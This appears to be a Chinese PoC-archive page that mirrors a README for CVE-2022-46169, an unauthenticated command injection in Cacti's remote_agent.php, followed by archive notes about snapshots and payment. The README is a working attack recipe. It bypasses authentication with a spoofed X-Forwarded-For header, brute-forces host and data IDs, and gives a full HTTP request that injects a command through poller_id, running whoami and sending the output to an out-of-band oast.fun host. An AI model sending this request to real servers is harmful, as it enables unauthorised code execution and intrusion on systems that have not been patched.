关联漏洞
标题:
Cacti 命令注入漏洞
(CVE-2022-46169)
描述:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti v1.2.22版本存在命令注入漏洞,该漏洞源于未经身份验证的命令注入,允许未经身份验证的用户在运行Cacti的服务器上执行任意代码。
描述
CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.
介绍
# CVE-2022-46169
CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.
## Auth Bypass
Add `X-Forwarded-For` header to bypass authentication, note that its value is not a fixed value.


## Brute Force
Use Burp Intruder to fuzz test the values of `host_id` and `local_data_ids`.


## RCE
The point of command injection is the `poller_id` parameter.
```http
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
```

## Reference
- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
文件快照
[4.0K] /data/pocs/4fe22cb786c8d0f5da53d8aa13fc1ed3c7e26e9d
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。